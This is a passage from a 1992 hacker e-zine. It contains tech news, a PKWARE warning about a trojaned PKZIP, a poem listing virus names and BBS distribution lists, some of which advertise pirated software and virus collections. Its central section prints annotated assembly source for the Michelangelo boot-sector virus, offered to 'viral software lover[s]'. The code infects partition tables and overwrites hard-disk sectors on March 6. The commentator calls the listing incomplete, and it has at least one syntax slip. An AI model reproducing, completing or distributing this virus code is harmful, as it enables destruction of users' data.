  761.  terminals.  RAM Mobile Data Ltd. operates a similar, compatible
  762.  system in the United Kingdom.  RAM's radio-based data
  763.  communications network architecture is Mobitex, an international,
  764.  open standard supplied by Ericsson.
  765.   RAM has exclusive use of the Mobitex technology in the
  766.  United States. Mobitex was developed by Ericsson Mobile
  767.  Communications AB and Swedish Telecom. Digital and Ericsson last
  768.  year signed a cooperation agreement under which the two companies
  769.  will develop software tools for the integration of Digital's
  770.  products with the Mobitex network.
  771.  
  772.   ALL-IN-1, DECmobile, the Digital logo, and Mobilizer for ALL-IN-1 are
  773.   trademarks of Digital Equipment Corporation.
  774.   Mobitex is a registered trademark of Swedish Telecom
  775.   MS-DOS is a registered trademark of Microsoft Corporation.
  776.   RAM Mobile Data's legal name is RAM Mobile Data USA Limited Partnership
  777.  
  778. ------------------------------------------------------------------------------
  779.  
  780.                HONEST OFFICER!, HE SAID HE BOUGHT THE STUFF
  781.  
  782.   Microsoft and the FBI recently raided four Silicon Valley companies
  783.  seizing bootleg copies of MS-DOS 5.0 and Windows 3.0 as well as associated
  784.  manuals with a street value of more than $180,000. The Tip-off came when
  785.  distributors tried to sell MS-DOS 5.0 seperately.
  786.  
  787. -------------------------------------------------------------------------------
  788.  
  789.                        BIG MAC ATTACK FOILED
  790.  
  791.   Two Cornell University students have been accused of creating a computer
  792.  virus called MBDF-A, that infected computers around the world.
  793.   David Blumenthal,20 and Mark Pilgrim,19 face a maximum four years in prison
  794.  for allegedly hiding the virus in three Macintosh computer games that were
  795.  sent via modem from Cornell's computer center to an archive at Stanford.
  796.   Macintosh PC's across the USA,Great Britain,and Japan were infected when
  797.  users downloaded the games. Once in the Macs the virus destroyed the operating
  798.  system.
  799.   The two were arrested on misdemeanor charges which have been increased to
  800.  felonies because the virus may have caused more than $1,000 in Damage.
  801.  
  802. -------------------------------------------------------------------------------
  803. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  804.  
  805.  Section [8]: FOR THE PEOPLE
  806.               Files Collected from BBS's Across the country
  807.               By You the Computer User!
  808.               Edited By: Mercenary
  809.  
  810. -------------------------------------------------------------------------------
  811.  IIRG NOTE: This source code file was floating around for some time
  812.             we provide it here for the programmer or viral software lover.
  813. -------------------------------------------------------------------------------
  814. ;
  815. ;
  816. ;     Michelangelo
  817. ;     Size: 512
  818. ;     Type: Boot infector
  819. ;     Date of action: March 6th
  820. ;
  821. ;
  822.  
  823. data_1e        equ  4Ch            ; (0000:004C=1DB1h)
  824. data_2e        equ  4Eh            ; (0000:004E=70h)
  825. data_3e        equ  413h           ; (0000:0413=280h)
  826. data_4e        equ  7C05h          ; (0000:7C05=203Ch)
  827. data_5e        equ  7C0Ah          ; (0000:7C0A=49EBh)
  828. data_6e        equ  7C0Ch          ; (0000:7C0C=2A3Ch)
  829. data_7e        equ  7              ; (694E:0007=0)
  830. data_8e        equ  8              ; (694E:0008=0)
  831. data_9e        equ  0Ah            ; (694E:000A=0)
  832. data_11e       equ  7C03h          ; (694E:7C03=0)
  833.  
  834. seg_a          segment
  835.           assume    cs:seg_a, ds:seg_a
  836.  
  837.  
  838.                org  100h
  839.  
  840. mich      proc      far
  841.  
  842. start:
  843.           jmp  loc_6 ; (01AF) "This is what you see at sector 0"
  844.           db   0F5h, 0, 80h, 9Fh, 2, 3 ; A lot of the virus is hidden
  845.           db   0, 56h, 2, 0, 0C8h, 1Eh ; in these defined bytes
  846.           db   50h, 0Ah, 0D2h, 75h, 1Bh, 33h ; watch this carefully
  847.           db   0C0h, 8Eh, 0D8h, 0F6h, 6, 3Fh ; or you will miss where
  848.           db   4, 1, 75h, 10h, 58h, 1Fh ; it writes to your
  849.           db   9Ch, 2Eh, 0FFh, 1Eh, 0Ah, 0 ; partiton table
  850.           db   9Ch, 0E8h, 0Bh, 0, 9Dh, 0CAh
  851.           db   2, 0, 58h, 1Fh, 2Eh, 0FFh
  852.           db   2Eh, 0Ah, 0, 50h, 53h, 51h
  853.           db   52h, 1Eh, 6, 56h, 57h, 0Eh
  854.           db   1Fh, 0Eh, 7, 0BEh, 4, 0
  855. loc_1: ;Init registers
  856.           mov  ax,201h
  857.           mov  bx,200h
  858.           mov  cx,1
  859.           xor  dx,dx               ; Zero register
  860.           pushf                    ; Push flags
  861.           call dword ptr ds:data_9e; (694E:000A=0)
  862.           jnc  loc_2               ; Jump if carry=0
  863.           xor  ax,ax               ; Zero register
  864.           pushf                    ; Push flags
  865.           call dword ptr ds:data_9e; (694E:000A=0)
  866.           dec  si
  867.           jnz  loc_1               ; Jump if not zero
  868.           jmp  short loc_5         ; (01A6)
  869. loc_2: ;Zero registers clear direction
  870.           xor  si,si               ; Zero register
  871.           cld                      ; Clear direction
  872.           lodsw                    ; String [si] to ax
  873.           cmp  ax,[bx]
  874.           jne  loc_3               ; Jump if not equal
  875.           lodsw                    ; String [si] to ax
  876.           cmp  ax,[bx+2]
  877.           je   loc_5               ; Jump if equal
  878. loc_3: ; cmp byte ptr See infected
  879.           mov  ax,301h
  880.           mov  dh,1
  881.           mov  cl,3
  882.           cmp  byte ptr [bx+15h],0FDh
  883.           je   loc_4               ; Jump if equal
  884.           mov  cl,0Eh
  885. loc_4: ;call out all db hiden data
  886.           mov  ds:data_8e,cx       ; (694E:0008=0)
  887.           pushf                    ; Push flags
  888.           call dword ptr ds:data_9e; (694E:000A=0)
  889.           jc   loc_5               ; Jump if carry Set
  890.           mov  si,3BEh
  891.           mov  di,1BEh
  892.           mov  cx,21h
  893.           cld                      ; Clear direction
  894.           rep  movsw               ; Rep while cx>0 Mov [si]
  895.           mov  ax,301h             ; to es:[di]
  896.           xor  bx,bx               ; Zero register
  897.           mov  cx,1
  898.           xor  dx,dx               ; Zero register
  899.           pushf                    ; Push flags
  900.           call dword ptr ds:data_9e; (694E:000A=0)
  901. loc_5: ;Clear all set
  902.           pop  di
  903.           pop  si
  904.           pop  es
  905.           pop  ds
  906.           pop  dx
  907.           pop  cx
  908.           pop  bx
  909.           pop  ax
  910.           retn
  911. loc_6: ;Load all hiden data
  912.           xor  ax,ax               ; Zero register
  913.           mov  ds,ax
  914.           cli                      ; Disable interrupts
  915.           mov  ss,ax
  916.           mov  ax,7C00h
  917.           mov  sp,ax
  918.           sti                      ; Enable interrupts
  919.           push ds
  920.           push ax
  921.           mov  ax,ds:data_1e       ; (0000:004C=1DB1h)
  922.           mov  ds:data_5e,ax       ; (0000:7C0A=49EBh)
  923.           mov  ax,ds:data_2e       ; (0000:004E=70h)
  924.           mov  ds:data_6e,ax       ; (0000:7C0C=2A3Ch)
  925.           mov  ax,ds:data_3e       ; (0000:0413=280h)
  926.           dec  ax
  927.           dec  ax
  928.           mov  ds:data_3e,ax       ; (0000:0413=280h)
  929.           mov  cl,6
  930.           shl  ax,cl               ; Shift w/zeros fill
  931.           mov  es,ax
  932.           mov  ds:data_4e,ax       ; (0000:7C05=203Ch)
  933.           mov  ax,0Eh
  934.           mov  ds:data_1e,ax       ; (0000:004C=1DB1h)
  935.           mov  ds:data_2e,es       ; (0000:004E=70h)
  936.           mov  cx,1BEh
  937.           mov  si,7C00h
  938.           xor  di,di               ; Zero register
  939.           cld                      ; Clear direction
  940.           rep  movsb               ; Rep while cx>0 Mov [si]
  941.           jmp  dword ptr cs:data_11e; to es:[di] (694E:7C03=0)
  942.           db   33h, 0C0h, 8Eh, 0C0h, 0CDh, 13h ;<- Notice all the
  943.           db   0Eh, 1Fh, 0B8h, 1, 2, 0BBh      ;          cd 13
  944.           db   0, 7Ch, 8Bh, 0Eh, 8, 0
  945.           db   83h, 0F9h, 7, 75h, 7, 0BAh
  946.           db   80h, 0, 0CDh, 13h, 0EBh, 2Bh
  947.           db   8Bh, 0Eh, 8, 0, 0BAh, 0
  948.           db   1, 0CDh, 13h, 72h, 20h, 0Eh
  949.           db   7, 0B8h, 1, 2, 0BBh, 0
  950.           db   2, 0B9h, 1, 0, 0BAh, 80h
  951.           db   0, 0CDh, 13h, 72h, 0Eh, 33h
  952.           db   0F6h, 0FCh, 0ADh, 3Bh, 7, 75h
  953.           db   4Fh, 0ADh, 3Bh, 47h, 2
  954.           db   75h, 49h
  955. loc_7:;check if it is time to nuke
  956.           xor  cx,cx               ; Zero register
  957.           mov  ah,4
  958.           int  1Ah ; Real time clock   ah=func 04h don't work on an xt
  959.                                    ; read date cx=year, dx=mon/day
  960.           cmp  dx,306h             ; See if March 6th
  961.           je   loc_8               ; Jump if equal to nuking subs
  962.           retf                     ; Return to launch command.com
  963. loc_8:;get ready
  964.           xor  dx,dx               ; Zero register
  965.           mov  cx,1
  966. loc_9:;run 7 times nuke 31.5 megs of hd
  967.           mov  ax,309h
  968.           mov  si,ds:data_8e       ; (694E:0008=0)
  969.           cmp  si,3
  970.           je   loc_10              ; Jump if equal
  971.           mov  al,0Eh
  972.           cmp  si,0Eh
  973.           je   loc_10              ; Jump if equal
  974.           mov  dl,80h
  975.           mov  byte ptr ds:data_7e,4; (694E:0007=0)
  976.           mov  al,11h
  977. loc_10: ;nuke away
  978.           mov  bx,5000h
  979.           mov  es,bx
  980.           int  13h                 ; Disk  dl=drive a: ah=func 03h
  981.                                    ;  write sectors from mem es:bx
  982.           jnc  loc_11              ; Jump if carry=0
  983.           xor  ah,ah               ; Zero register
  984.           int  13h                 ; Disk  dl=drive a: ah=func 00h
  985.                                    ;  reset disk, al=return status
  986. loc_11: ;rest for loc-9 nuking
  987.           inc  dh
  988.           cmp  dh,ds:data_7e       ; (694E:0007=0)
  989.           jb   loc_9               ; Jump if below
  990.           xor  dh,dh               ; Zero register
  991.           inc  ch
  992.           jmp  short loc_9         ; (0250)
  993. loc_12:;time to infect a floppie or hard dirve
  994.           mov  cx,7
  995.           mov  ds:data_8e,cx       ; (694E:0008=0)
  996.           mov  ax,301h
  997.           mov  dx,80h
  998.           int  13h                ; Disk  dl=drive a: ah=func 03h infect flopie
  999.                                    ;  write sectors from mem es:bx
  1000.           jc   loc_7               ; Jump if carry Set
  1001.           mov  si,3BEh
  1002.           mov  di,1BEh
  1003.           mov  cx,21h
  1004.           rep  movsw               ; Rep while cx>0 Mov [si]
  1005.           mov  ax,301h                 : to es:[di]
  1006.           xor  bx,bx               ; Zero register
  1007.           inc  cl
  1008.           int  13h               ; Disk  dl=drive a: ah=func 03h lets infect hd
  1009.                                    ;  write sectors from mem es:bx
  1010. ;*        jmp  short loc_13        ;*(02E0)
  1011.           db   0EBh, 32h
  1012.           db   1, 4, 11h, 0, 80h, 0
  1013.           db   5, 5, 32h, 1, 0, 0
  1014.           db   0, 0, 0
  1015.           db   53h, 53h, 20h, 20h, 43h, 4Fh
  1016.           db   4Dh
  1017.           db   58 dup (0)
  1018.           db   55h, 0AAh
  1019.  
  1020. seg_a          ends
  1021.  
  1022. ;Last notes this virus looks like a poor hack job on the stoned virus.
  1023. ;It is kinda cool in the fact that it is hard to get out of the partition table
  1024. ;even if you nuke the partition table it will live on even if you replace it.
  1025. ;the only way to get it out of the partition table is 1. debug 2.clean ver 86b
  1026. ;3 cpav 1.0 and above. oh yeah and all that special shit that came out for it
  1027. ;this virus uses int 1ah which doesn't work on an XT system.
  1028. ;the virus isn't actually 512 but that is how much it writes.
  1029. ;it moves the boot area of a floppy to the last sector on the disk
  1030. ;and on a harddrive it moves it to the last sector in the root directory
  1031. ;This should show you all how much the media can over do it on things
  1032. ;since this is really a lame virus, to tell you the truth there is a lot better
  1033. ;ones out there.
  1034. ;This in no way is a complete listing of the code for the virus.
  1035. ;Nor is it the best since i'm not the best at Assembly.
  1036. ;Done by Visionary.
  1037. ;BTW to who ever wrote this virus... Get a life!
  1038.  
  1039. -------------------------------------------------------------------------------
  1040.  
  1041. 03/16/1992
  1042.  
  1043.     WARNING!  WARNING!  WARNING!  WARNING!  WARNING!  WARNING!  WARNING!
  1044.     --------------------------------------------------------------------
  1045.  
  1046.     There is a file being circulated on BBS's called PKZ201.ZIP or
  1047.     PKZ201.EXE or similar, and that claims to be version 2.01 of
  1048.     PKZIP but in fact is a hacked version of PKZIP 1.93 Alpha.
  1049.  
  1050.     As of the date of this writing, the latest version of PKZIP is
  1051.     version 1.10.
  1052.  
  1053.     If you see the files PKZ201.ZIP or PKZ201.EXE on any BBS or
  1054.     on-line system, please ask the SysOp of that system to remove
  1055.     the files IMMEDIATELY, and please contact PKWARE to report
  1056.     where the files were seen.
  1057.  
  1058.     Of course, because of this PKWARE will never release a version
  1059.     of PKZIP with the version number 2.01.
  1060.  
  1061.     If you have any information about the source of PKZ201.EXE or
  1062.     PKZ201.ZIP, please report it to PKWARE immediately, either:
  1063.  
  1064.     by Voice at 414-354-8699
  1065.     by BBS   at 414-354-8670
  1066.     by FAX   at 414-354-8559
  1067.     or by mail:
  1068.  
  1069.                 PKWARE Inc.
  1070.                 9025 N. Deerwood Drive
  1071.                 Brown Deer, WI 53223 USA
  1072.  
  1073.  
  1074.                                              Sincerely,
  1075.  
  1076.  
  1077.                                                 Phil Katz
  1078.                                                 President, PKWARE Inc.
  1079. -------------------------------------------------------------------------------
  1080.  
  1081.  A VIRUS POEM
  1082.  By: Brooks Hilliard
  1083.  
  1084.  There's Beta and Manta,Get Password and CB
  1085.   Amstrad and Leningrad,F-Word and BeBe
  1086.  Haifa,Messina,Enigma,Gergana
  1087.   Tequila,Azuza and Nina,Vienna.
  1088.  There's Smily and Shirly,Israeli and Anthrax
  1089.   and Yankee and Miky,Raubkopi,Oropax.
  1090.  There's Newcom and Checksum and Boojum and Prism
  1091.   and Incom and Phantom and Planinum and Skism.
  1092.  There's Scrambler and Squeaker and Joker,Disk Killer,
  1093.   Filler Despoiler and Green Caterpillar.
  1094.  Theres Jojo,Ohio and Spanish April Fool,
  1095.   Frodo and Turbo,Jerusalem Mule.
  1096.  There's Sadist and Chemist and Cinderella.
  1097.   Burger and Ogre and Finger and Kalah.
  1098.  Azusa,Eliza,Zargosa and Sotcha,
  1099.   Macedonia,Albania,Necrophilia and Gotcha.
  1100.  Theres Palette and Merritt, and Friday the 13th
  1101.   and Saddam and Virdem and Saturday 14th.
  1102.  There's Typo,Empire,and Topo,and Ping Pong,
  1103.   Mosquito,and Fire,and Psycho,and Lao Doung.
  1104.  Theres USSR and Ambulance Car,
  1105.   And Wonder,Surrender and Redstar and Spar
  1106.  Bugares,Vorohezh,Xabaras,and Flash
  1107.   Microbes and Irish,Addidas and Crash.
  1108.  There's Timid,New Zealand,Bloody! and Tiny DI.
  1109.  There's Stupid and Lovechild and Froggie and Lehigh.
  1110.  There's Stoned and Scotts Valley and Happy N.Y.
  1111.  There's Cascade,Black Wizard and also Bad Guy.
  1112.  There's Frere Jacques,Maraudar,Invader,
  1113.   Vacsina Rybka and also Darth Vader.
  1114.  There's Barcelona and Nomenkla-tara,
  1115.   and then Montezuma and Hydra and Cara.
  1116.  There's Music,Icelandic,Generic and Whale,
  1117.  There's Lisbon and Pentagon and Phalcon and Yale.
  1118.   Pirate and Mutant and Fumble and Hello
  1119.  There's Patient and Advent and Michelangelo.
  1120.  That's 130 viruses,smaller and greater
  1121.   If you don't get protected,You'll lose all your data.
  1122.  
  1123.  
  1124. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1125.  
  1126.  Section [9]: IIRG Distribution Sites
  1127.  
  1128.  
  1129.  
  1130.  
  1131.                    //////    //////     ///////     ////////
  1132.                     //        //       //    //    //
  1133.                    //        //       ///////     //   ////
  1134.                   //        //       //    //    //     //
  1135.                ////// *  //////  *  //     // * /////////
  1136.  
  1137.  
  1138.  
  1139.  
  1140.     IIRG World HQ:           Dark Shadows
  1141.                              19.2/9600 Baud HST
  1142.                              24 Hours a Day
  1143.                              1.2 Gigs Online
  1144.                              (203)-628-9660
  1145.  
  1146.  
  1147.    IIRG Distribution Site 1: Restaurant at the End of the Universe
  1148.                              2400/1200 Baud (3 Nodes!!)
  1149.                              24 hours a day
  1150.                              130 Megs of Files
  1151.                              (203)567-8903 2 Nodes 2400
  1152.                              (203)567-4808 1 Node 1200
  1153.  
  1154.    IIRG Distribution Site 2: The Generic Access BBS
  1155.                              INC New England Regional District HQs
  1156.                              IUD New England Regional District HQs
  1157.                              1.2 gigs online
  1158.                              USR Dual Standard HST
  1159.                              NO Ratios
  1160.                              (508) 281-3961
  1161.  
  1162.    IIRG Distribution Site 3: The Sanitarium
  1163.                              Sysops: Morbid Angel [INC/ACID]
  1164.                                      Spectral Illusion [ACID/RAZOR]
  1165.                              IIRG Distribution Site
  1166.                              ACID Member Board
  1167.                              INC Courier Board
  1168.                              RAZOR 1911 Courier Board
  1169.                              VISA World Headquarters
  1170.                              (817)PRI-VATE
  1171.  
  1172.  
  1173.    IIRG Distribution Site 4: CTHH 666
  1174.                              2400 - 57.6 Baud
  1175.                              Sysop: Beelzebub
  1176.                              HAU AB! East Coast Headquarters
  1177.                              Hackers Alliance Of The Underground Abuse
  1178.                              I.I.R.G. Distribution Site
  1179.  
  1180. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1181.  
  1182.  Section [9]: Phantasy Distribution Sites
  1183.  
  1184.  Phantasy's Distribution Site's are continually growing, we apologize if you
  1185.  called a board and didn't find the Mag. Network Distribution Sites will
  1186.  have the Issues first, we suggest calling one of them if a problem does
  1187.  arise.
  1188.  
  1189.  
  1190.   1. Lightning Systems
  1191.      (414) 363-4282
  1192.      Sixty Million Bytes OnLine
  1193.      USRobotics Dual Standard HST/V.32bis
  1194.      2400 thru 14.4k v.32bis/HST
  1195.  
  1196.   2. Sycamore Elite
  1197.      19,200-1200 Baud HST, 24 Hours a day
  1198.      (815) 895-5573
  1199.  
  1200.   3. The Works BBS at (617-861-8976)
  1201.      Largest Text Files BBS in the world, 3500+ text files online.
  1202.      2400-300 Baud, 24 Hours a day
  1203.  
  1204.   4. Pipers Pit BBS
  1205.      19,200-9600 HST ONLY!!
  1206.      24 Hours a Day
  1207.      THG Distro Site 1300 Megs
  1208.      (203)PRI-VATE [2 Nodes]
  1209.  
  1210.   5. Blitzkrieg BBS                  TAP Magazine
  1211.      (502)-499-8933                  P.O. BOX 20264
  1212.      Home of TAP MAgazine            Louisville,KY. 40250-0264
  1213.  
  1214.   6. The Dickinson Nightlight
  1215.      (713)-337-1452
  1216.      Der WeltanSchauung Distro Site (World View Magazine)
  1217.      Phantasy Distro Site
  1218.  
  1219.   7. Lucid Dreams
  1220.      SysOp: Louis Cypher    Number: (713)522-0709
  1221.      Running: Flashback  Speed: USR DS 38.4
  1222.      0-1 Day Warez    1400 T-Files
  1223.      300+ Virii  Net: TcH
  1224.  
  1225.  
  1226. PHANTASY is also available on:
  1227.  
  1228.              1. RIPCO BBS (312)528-5020
  1229.  
  1230.  
  1231. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1232.                        PHANTASY(C) IIRG 1991,1992
  1233.                         May Odin Guide Your Way!
  1234. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  1235.  
  1236.  
  1237.